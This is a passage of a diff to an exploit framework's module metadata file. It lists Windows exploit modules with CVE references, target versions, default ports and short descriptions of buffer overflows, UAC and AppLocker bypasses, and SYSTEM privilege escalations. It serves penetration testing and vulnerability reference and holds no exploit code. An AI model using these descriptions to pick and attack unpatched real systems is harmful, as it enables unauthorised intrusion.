"disclosure_date": "2005-11-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", + "references": [ + "CVE-2005-3314", + "OSVDB-20956", + "BID-15491" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/novell_netmail_status.rb", + "is_install_path": true, + "ref_name": "windows/imap/novell_netmail_status", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/novell_netmail_subscribe": { + "name": "Novell NetMail IMAP SUBSCRIBE Buffer Overflow", + "fullname": "exploit/windows/imap/novell_netmail_subscribe", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-12-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", + "references": [ + "CVE-2006-6761", + "OSVDB-31360", + "BID-21728", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/novell_netmail_subscribe.rb", + "is_install_path": true, + "ref_name": "windows/imap/novell_netmail_subscribe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/ms00_094_pbserver": { + "name": "MS00-094 Microsoft IIS Phone Book Service Overflow", + "fullname": "exploit/windows/isapi/ms00_094_pbserver", + "aliases": [], + "rank": 400, + "disclosure_date": "2000-12-04", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This is an exploit for the Phone Book Service /pbserver/pbserver.dll\n described in MS00-094. By sending an overly long URL argument\n for phone book updates, it is possible to overwrite the stack. This\n module has only been tested against Windows 2000 SP1.", + "references": [ + "CVE-2000-1089", + "OSVDB-463", + "BID-2048", + "MSB-MS00-094" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP1", + "Windows 2000 SP0", + "Windows NT SP6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/ms00_094_pbserver.rb", + "is_install_path": true, + "ref_name": "windows/isapi/ms00_094_pbserver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/ms03_022_nsiislog_post": { + "name": "MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow", + "fullname": "exploit/windows/isapi/ms03_022_nsiislog_post", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-06-25", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a buffer overflow found in the nsiislog.dll\n ISAPI filter that comes with Windows Media Server. This\n module will also work against the 'patched' MS03-019\n version. This vulnerability was addressed by MS03-022.", + "references": [ + "CVE-2003-0349", + "OSVDB-4535", + "BID-8035", + "MSB-MS03-022", + "URL-http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Brute Force", + "Windows 2000 -MS03-019", + "Windows 2000 +MS03-019", + "Windows XP -MS03-019" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb", + "is_install_path": true, + "ref_name": "windows/isapi/ms03_022_nsiislog_post", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/ms03_051_fp30reg_chunked": { + "name": "MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow", + "fullname": "exploit/windows/isapi/ms03_051_fp30reg_chunked", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-11-11", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This is an exploit for the chunked encoding buffer overflow\n described in MS03-051 and originally reported by Brett\n Moore. This particular modules works against versions of\n Windows 2000 between SP0 and SP3. Service Pack 4 fixes the\n issue.", + "references": [ + "CVE-2003-0822", + "OSVDB-2952", + "BID-9007", + "MSB-MS03-051" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP0-SP3", + "Windows 2000 07/22/02", + "Windows 2000 10/06/99" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb", + "is_install_path": true, + "ref_name": "windows/isapi/ms03_051_fp30reg_chunked", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/rsa_webagent_redirect": { + "name": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow", + "fullname": "exploit/windows/isapi/rsa_webagent_redirect", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-10-21", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the SecurID Web\n Agent for IIS. This ISAPI filter runs in-process with\n inetinfo.exe, any attempt to exploit this flaw will result\n in the termination and potential restart of the IIS service.", + "references": [ + "CVE-2005-4734", + "OSVDB-20151" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "RSA WebAgent 5.2", + "RSA WebAgent 5.3", + "RSA WebAgent 5.2 on Windows 2000 English", + "RSA WebAgent 5.3 on Windows 2000 English", + "RSA WebAgent 5.2 on Windows XP SP0-SP1 English", + "RSA WebAgent 5.3 on Windows XP SP0-SP1 English", + "RSA WebAgent 5.2 on Windows XP SP2 English", + "RSA WebAgent 5.3 on Windows XP SP2 English", + "RSA WebAgent 5.2 on Windows 2003 English SP0", + "RSA WebAgent 5.3 on Windows 2003 English SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/rsa_webagent_redirect.rb", + "is_install_path": true, + "ref_name": "windows/isapi/rsa_webagent_redirect", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/w3who_query": { + "name": "Microsoft IIS ISAPI w3who.dll Query String Overflow", + "fullname": "exploit/windows/isapi/w3who_query", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-12-06", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the w3who.dll ISAPI\n application. This vulnerability was discovered Nicolas\n Gregoire and this code has been successfully tested against\n Windows 2000 and Windows XP (SP2). When exploiting Windows\n XP, the payload must call RevertToSelf before it will be\n able to spawn a command shell.", + "references": [ + "CVE-2004-1134", + "OSVDB-12258", + "URL-http://www.exaprobe.com/labs/advisories/esa-2004-1206.html", + "BID-11820" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Detection", + "Windows 2000 RESKIT DLL [Windows 2000]", + "Windows 2000 RESKIT DLL [Windows XP]" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/w3who_query.rb", + "is_install_path": true, + "ref_name": "windows/isapi/w3who_query", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ldap/imail_thc": { + "name": "IMail LDAP Service Buffer Overflow", + "fullname": "exploit/windows/ldap/imail_thc", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-02-17", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a buffer overflow in the LDAP service that is\n part of the IMail product. This module was tested against\n version 7.10 and 8.5, both running on Windows 2000.", + "references": [ + "CVE-2004-0297", + "OSVDB-3984", + "BID-9682", + "URL-http://web.archive.org/web/20060110155821/http://secunia.com:80/advisories/10880/" + ], + "platform": "Windows", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 English", + "Windows 2000 IMail 8.x" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/ldap/imail_thc.rb", + "is_install_path": true, + "ref_name": "windows/ldap/imail_thc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ldap/pgp_keyserver7": { + "name": "Network Associates PGP KeyServer 7 LDAP Buffer Overflow", + "fullname": "exploit/windows/ldap/pgp_keyserver7", + "aliases": [], + "rank": 400, + "disclosure_date": "2001-07-16", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the LDAP service that is\n part of the NAI PGP Enterprise product suite. This module was tested\n against PGP KeyServer v7.0. Due to space restrictions, egghunter is\n used to find our payload - therefore you may wish to adjust WfsDelay.", + "references": [ + "CVE-2001-1320", + "OSVDB-4742", + "BID-3046", + "URL-http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/" + ], + "platform": "Windows", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal PGPcertd.exe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ldap/pgp_keyserver7.rb", + "is_install_path": true, + "ref_name": "windows/ldap/pgp_keyserver7", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/license/calicclnt_getconfig": { + "name": "Computer Associates License Client GETCONFIG Overflow", + "fullname": "exploit/windows/license/calicclnt_getconfig", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-03-02", + "type": "exploit", + "author": [ + "hdm ", + "aushack " + ], + "description": "This module exploits a vulnerability in the CA License Client\n service. This exploit will only work if your IP address can be\n resolved from the target system point of view. This can be\n accomplished on a local network by running the 'nmbd' service\n that comes with Samba. If you are running this exploit from\n Windows and do not filter udp port 137, this should not be a\n problem (if the target is on the same network segment). Due to\n the bugginess of the software, you are only allowed one connection\n to the agent port before it starts ignoring you. If it wasn't for this\n issue, it would be possible to repeatedly exploit this bug.", + "references": [ + "CVE-2005-0581", + "OSVDB-14389", + "BID-12705", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213" + ], + "platform": "Windows", + "arch": "", + "rport": 10203, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 English", + "Windows XP English SP0-1", + "Windows XP English SP2", + "Windows 2003 English SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/license/calicclnt_getconfig.rb", + "is_install_path": true, + "ref_name": "windows/license/calicclnt_getconfig", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/license/calicserv_getconfig": { + "name": "Computer Associates License Server GETCONFIG Overflow", + "fullname": "exploit/windows/license/calicserv_getconfig", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-03-02", + "type": "exploit", + "author": [ + "hdm ", + "aushack " + ], + "description": "This module exploits an vulnerability in the CA License Server\n network service. By sending an excessively long GETCONFIG\n packet the stack may be overwritten.", + "references": [ + "CVE-2005-0581", + "OSVDB-14389", + "BID-12705", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213" + ], + "platform": "Windows", + "arch": "", + "rport": 10202, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 English", + "Windows XP English SP0-1", + "Windows XP English SP2", + "Windows 2003 English SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/license/calicserv_getconfig.rb", + "is_install_path": true, + "ref_name": "windows/license/calicserv_getconfig", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/license/flexnet_lmgrd_bof": { + "name": "FlexNet License Server Manager lmgrd Buffer Overflow", + "fullname": "exploit/windows/license/flexnet_lmgrd_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-23", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Alexander Gavrun", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a vulnerability in the FlexNet\n License Server Manager.\n\n The vulnerability is due to the insecure usage of memcpy\n in the lmgrd service when handling network packets, which\n results in a stack buffer overflow.\n\n In order to improve reliability, this module will make lots of\n connections to lmgrd during each attempt to maximize its success.", + "references": [ + "OSVDB-81899", + "BID-52718", + "ZDI-12-052", + "URL-http://aluigi.altervista.org/adv/lmgrd_1-adv.txt", + "URL-http://www.flexerasoftware.com/pl/13057.htm" + ], + "platform": "Windows", + "arch": "", + "rport": 27000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Debug", + "Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3", + "Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3", + "Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/license/flexnet_lmgrd_bof.rb", + "is_install_path": true, + "ref_name": "windows/license/flexnet_lmgrd_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/license/sentinel_lm7_udp": { + "name": "SentinelLM UDP Buffer Overflow", + "fullname": "exploit/windows/license/sentinel_lm7_udp", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-03-07", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a simple stack buffer overflow in the Sentinel\n License Manager. The SentinelLM service is installed with a\n wide selection of products and seems particular popular with\n academic products. If the wrong target value is selected,\n the service will crash and not restart.", + "references": [ + "CVE-2005-0353", + "OSVDB-14605", + "BID-12742" + ], + "platform": "Windows", + "arch": "", + "rport": 5093, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6", + "SentinelLM 7.2.0.0 Windows 2000 English", + "SentinelLM 7.2.0.0 Windows 2000 German", + "SentinelLM 7.2.0.0 Windows XP English SP0/SP1", + "SentinelLM 7.2.0.0 Windows 2003 English SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/license/sentinel_lm7_udp.rb", + "is_install_path": true, + "ref_name": "windows/license/sentinel_lm7_udp", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/local/adobe_sandbox_adobecollabsync": { + "name": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass", + "fullname": "exploit/windows/local/adobe_sandbox_adobecollabsync", + "aliases": [], + "rank": 500, + "disclosure_date": "2013-05-14", + "type": "exploit", + "author": [ + "Felipe Andres Manzano", + "juan vazquez " + ], + "description": "This module exploits a vulnerability on Adobe Reader X Sandbox. The\n vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe\n process to write register values which can be used to trigger a buffer overflow on\n the AdobeCollabSync component, allowing to achieve Medium Integrity Level\n privileges from a Low Integrity AcroRd32.exe process. This module has been tested\n successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.", + "references": [ + "CVE-2013-2730", + "OSVDB-93355", + "URL-http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader X 10.1.4 / Windows 7 SP1" + ], + "mod_time": "2022-12-04 17:41:24 +0000", + "path": "/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb", + "is_install_path": true, + "ref_name": "windows/local/adobe_sandbox_adobecollabsync", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/agnitum_outpost_acs": { + "name": "Agnitum Outpost Internet Security Local Privilege Escalation", + "fullname": "exploit/windows/local/agnitum_outpost_acs", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-08-02", + "type": "exploit", + "author": [ + "Ahmad Moghimi", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability on Agnitum Outpost Internet\n Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load\n arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary\n code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with\n Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).", + "references": [ + "OSVDB-96208", + "EDB-27282" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Agnitum Outpost Internet Security 8.1" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/local/agnitum_outpost_acs.rb", + "is_install_path": true, + "ref_name": "windows/local/agnitum_outpost_acs", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/alpc_taskscheduler": { + "name": "Microsoft Windows ALPC Task Scheduler Local Privilege Elevation", + "fullname": "exploit/windows/local/alpc_taskscheduler", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-08-27", + "type": "exploit", + "author": [ + "SandboxEscaper", + "bwatters-r7", + "asoto-r7", + "Jacob Robles" + ], + "description": "On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented\n by the task scheduler service can be used to write arbitrary DACLs to `.job` files located\n in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this\n location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be\n created to a file the user has read access to. After creating a hardlink, the vulnerability\n can be triggered to set the DACL on the linked file.\n\n WARNING:\n The PrintConfig.dll (%windir%\\system32\\driverstor\\filerepository\\prnms003*) on the target host\n will be overwritten when the exploit runs.\n\n This module has been tested against Windows 10 Pro x64.", + "references": [ + "CVE-2018-8440", + "URL-https://github.com/SandboxEscaper/randomrepo/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/alpc_taskscheduler.rb", + "is_install_path": true, + "ref_name": "windows/local/alpc_taskscheduler", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "os-resource-loss" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/always_install_elevated": { + "name": "Windows AlwaysInstallElevated MSI", + "fullname": "exploit/windows/local/always_install_elevated", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-03-18", + "type": "exploit", + "author": [ + "Ben Campbell ", + "Parvez Anwar" + ], + "description": "This module checks the AlwaysInstallElevated registry keys which dictates if\n .MSI files should be installed with elevated privileges (NT AUTHORITY\\SYSTEM).\n The generated .MSI file has an embedded executable which is extracted and run\n by the installer. After execution the .MSI file intentionally fails installation\n (by calling some invalid VBS) to prevent it being registered on the system.\n By running this with the /quiet argument the error will not be seen by the user.", + "references": [ + "URL-http://www.greyhathacker.net/?p=185", + "URL-http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx", + "URL-http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/local/always_install_elevated.rb", + "is_install_path": true, + "ref_name": "windows/local/always_install_elevated", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/anyconnect_lpe": { + "name": "Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)", + "fullname": "exploit/windows/local/anyconnect_lpe", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-08-05", + "type": "exploit", + "author": [ + "Yorick Koster", + "Antoine Goichot (ATGO)", + "Christophe De La Fuente" + ], + "description": "The installer component of Cisco AnyConnect Secure Mobility Client for Windows\n prior to 4.8.02042 is vulnerable to path traversal and allows local attackers\n to create/overwrite files in arbitrary locations with system level privileges.\n\n The installer component of Cisco AnyConnect Secure Mobility Client for Windows\n prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers\n to execute code on the affected machine with with system level privileges.\n\n Both attacks consist in sending a specially crafted IPC request to the TCP\n port 62522 on the loopback device, which is exposed by the Cisco AnyConnect\n Secure Mobility Agent service. This service will then launch the vulnerable\n installer component (`vpndownloader`), which copies itself to an arbitrary\n location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being\n executed with system privileges. Since `vpndownloader` is also vulnerable to DLL\n hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same\n location `vpndownloader` will be copied to get code execution with system\n privileges.\n\n The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect\n Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10\n version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been\n successfully tested against Cisco AnyConnect Secure Mobility Client versions\n 4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version\n 1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).", + "references": [ + "URL-https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj", + "CVE-2020-3153", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW", + "CVE-2020-3433" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86/x64 with x86 payload" + ], + "mod_time": "2023-01-28 09:08:51 +0000", + "path": "/modules/exploits/windows/local/anyconnect_lpe.rb", + "is_install_path": true, + "ref_name": "windows/local/anyconnect_lpe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/applocker_bypass": { + "name": "AppLocker Execution Prevention Bypass", + "fullname": "exploit/windows/local/applocker_bypass", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-08-03", + "type": "exploit", + "author": [ + "Casey Smith", + "OJ Reeves" + ], + "description": "This module will generate a .NET service executable on the target and utilize\n InstallUtil to run the payload bypassing the AppLocker protection.\n\n Currently only the InstallUtil method is provided, but future methods can be\n added easily.", + "references": [ + "URL-https://gist.github.com/subTee/fac6af078937dda81e57" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/local/applocker_bypass.rb", + "is_install_path": true, + "ref_name": "windows/local/applocker_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/appxsvc_hard_link_privesc": { + "name": "AppXSvc Hard Link Privilege Escalation", + "fullname": "exploit/windows/local/appxsvc_hard_link_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-04-09", + "type": "exploit", + "author": [ + "Nabeel Ahmed", + "James Forshaw", + "Shelby Pace" + ], + "description": "There exists a privilege escalation vulnerability for\n Windows 10 builds prior to build 17763. Due to the AppXSvc's\n improper handling of hard links, a user can gain full\n privileges over a SYSTEM-owned file. The user can then utilize\n the new file to execute code as SYSTEM.\n\n This module employs a technique using the Diagnostics Hub Standard\n Collector Service (DiagHub) which was discovered by James Forshaw to\n load and execute a DLL as SYSTEM.", + "references": [ + "CVE-2019-0841", + "URL-https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/", + "URL-https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html", + "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", + "URL-https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/appxsvc_hard_link_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ask": { + "name": "Windows Escalate UAC Execute RunAs", + "fullname": "exploit/windows/local/ask", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-01-03", + "type": "exploit", + "author": [ + "mubix ", + "b00stfr3ak" + ], + "description": "This module will attempt to elevate execution level using\n the ShellExecute undocumented RunAs flag to bypass low\n UAC settings.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/local/ask.rb", + "is_install_path": true, + "ref_name": "windows/local/ask", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bits_ntlm_token_impersonation": { + "name": "SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.", + "fullname": "exploit/windows/local/bits_ntlm_token_impersonation", + "aliases": [], + "rank": 500, + "disclosure_date": "2019-12-06", + "type": "exploit", + "author": [ + "Cassandre", + "Andrea Pierini (decoder)", + "Antonio Cocomazzi (splinter_code)", + "Roberto (0xea31)" + ], + "description": "This module exploit BITS behavior which tries to connect to the\n local Windows Remote Management server (WinRM) every times it\n starts. The module launches a fake WinRM server which listen on\n port 5985 and triggers BITS. When BITS starts, it tries to\n authenticate to the Rogue WinRM server, which allows to steal a\n SYSTEM token. This token is then used to launch a new process\n as SYSTEM user. In the case of this exploit, notepad.exe is launched\n as SYSTEM. Then, it write shellcode in its previous memory space\n and trigger its execution. As this exploit uses reflective dll\n injection, it does not write any file on the disk. See\n /documentation/modules/exploit/windows/local/bits_ntlm_token_impersonation.md\n for complementary words of information.\n\n Vulnerable operating systems are Windows 10 and Windows servers where WinRM is not running.\n Lab experiments has shown that Windows 7 does not exhibit the vulnerable behavior.\n\n WARNING:\n\n - As this exploit runs a service on the target (Fake WinRM on port\n 5985), a firewall popup may appear on target screen. Thus, this exploit\n may not be completely silent.\n\n - This exploit has been successfully tested on :\n Windows 10 (10.0 Build 19041) 32 bits\n Windows 10 Pro, Version 1903 (10.0 Build 18362) 64 bits\n\n - This exploit failed because of no BITS authentication attempt on:\n Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits\n\n - Windows servers are not vulnerable because a genuine WinRM\n service is already running, except if the user has disabled it\n (Or if this exploit succeed to terminate it).\n\n - SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privs are\n required.\n\n - BITS must not be running.\n\n - This exploit automatically perform above quoted checks.\n run \"check\" command to run checklist.", + "references": [ + "URL-https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/", + "URL-https://github.com/antonioCoco/RogueWinRM" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bits_ntlm_token_impersonation.rb", + "is_install_path": true, + "ref_name": "windows/local/bits_ntlm_token_impersonation", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bthpan": { + "name": 